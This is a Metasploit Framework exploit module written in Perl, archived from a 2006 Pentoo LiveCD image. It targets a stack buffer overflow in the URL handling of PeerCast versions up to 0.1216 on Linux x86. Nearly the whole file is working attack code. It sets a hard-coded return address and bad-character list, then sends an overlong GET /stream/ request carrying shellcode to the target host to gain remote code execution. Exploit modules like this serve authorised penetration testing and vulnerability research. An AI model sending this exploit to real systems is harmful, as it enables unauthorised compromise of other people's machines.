home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / peercast_url_linux.pm < prev    next >
Text File  |  2006-06-30  |  3KB  |  110 lines
  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::peercast_url_linux;
  11. use base "Msf::Exploit";
  12. use strict;
  13. use Pex::Text;
  14.  
  15. my $advanced = { };
  16.  
  17. my $info =
  18.   {
  19.  
  20.     'Name'  => 'PeerCast <= 0.1216 URL Handling Buffer Overflow (Linux)',
  21.     'Version'  => '$Revision: 1.2 $',
  22.     'Authors' => [ 'y0 [at] w00t-shell.net', ],
  23.     'Arch'  => [ 'x86' ],
  24.     'OS'    => [ 'linux'],
  25.     'Priv'  => 0,
  26.     'UserOpts'  =>
  27.       {
  28.         'RHOST' => [1, 'ADDR', 'The target address'],
  29.         'RPORT' => [1, 'PORT', 'The target port', 7144],
  30.         'SSL'   => [0, 'BOOL', 'Use SSL'],
  31.       },
  32.  
  33.     'Payload' =>
  34.       {
  35.         'Space'     => 200,
  36.         'BadChars' => "\x00\x0a\x0d\x20\x0d\x2f\x3d\x3b",
  37.       },
  38.  
  39.     'Description'  => Pex::Text::Freeform(qq{
  40.     This module exploits a stack overflow in PeerCast <= v0.1216. 
  41.     The vulnerability is caused due to a boundary error within the
  42.     handling of URL parameters.
  43. }),
  44.  
  45.     'Refs'  =>
  46.       [
  47.           ['OSVDB', '23777'],
  48.         ['BID', '17040'],
  49.         ['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'],
  50.       ],
  51.  
  52.     'DefaultTarget' => 0,
  53.  
  54.     'Targets' =>
  55.       [
  56.         ['PeerCast v0.1212 binary', 0x080922f7 ],
  57.       ],
  58.  
  59.     'Keys' => ['peercast'],
  60.  
  61.     'DisclosureDate' => 'March 8 2006',
  62.   };
  63.  
  64. sub new {
  65.     my $class = shift;
  66.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  67.     return($self);
  68. }
  69.  
  70. sub Exploit
  71. {
  72.     my $self = shift;
  73.     my $target_host = $self->GetVar('RHOST');
  74.     my $target_port = $self->GetVar('RPORT');
  75.     my $target_idx  = $self->GetVar('TARGET');
  76.     my $offset      = $self->GetVar('OFFSET');
  77.     my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
  78.     my $target = $self->Targets->[$target_idx];
  79.  
  80.     if (! $self->InitNops(128)) {
  81.         $self->PrintLine("[*] Failed to initialize the nop module.");
  82.         return;
  83.     }
  84.  
  85.     my $sploit =
  86.       "GET /stream/?". Pex::Text::AlphaNumText(780).
  87.       pack('V', $target->[1]). $shellcode. "\r\n";
  88.  
  89.     $self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));
  90.  
  91.     my $s = Msf::Socket::Tcp->new
  92.       (
  93.         'PeerAddr'  => $target_host,
  94.         'PeerPort'  => $target_port,
  95.         'LocalPort' => $self->GetVar('CPORT'),
  96.         'SSL'       => $self->GetVar('SSL'),
  97.       );
  98.     if ($s->IsError) {
  99.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  100.         return;
  101.     }
  102.  
  103.     $s->Send($sploit);
  104.     $self->Handler($s);
  105.     $s->Close();
  106.     return;
  107. }
  108.  
  109. 1;
  110.